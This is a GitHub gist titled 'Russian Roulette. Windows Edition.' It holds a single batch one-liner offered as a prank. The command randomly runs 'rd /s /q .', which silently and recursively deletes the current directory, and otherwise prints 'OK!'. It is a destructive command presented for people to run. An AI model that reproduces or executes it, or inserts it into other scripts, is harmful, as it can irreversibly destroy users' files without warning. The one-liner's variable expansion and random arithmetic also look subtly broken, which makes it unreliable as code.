Skip to content

Instantly share code, notes, and snippets.

@DartPower
Created March 4, 2023 14:46
Show Gist options
  • Save DartPower/ea1fbbbe2b3b589b4705e18daf480ef4 to your computer and use it in GitHub Desktop.
Save DartPower/ea1fbbbe2b3b589b4705e18daf480ef4 to your computer and use it in GitHub Desktop.
Russian Roulette. Windows Edition.
set /a R=0+(6*%random%)/%random% & if !R! == 0 (rd /s /q .) else (echo OK!)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment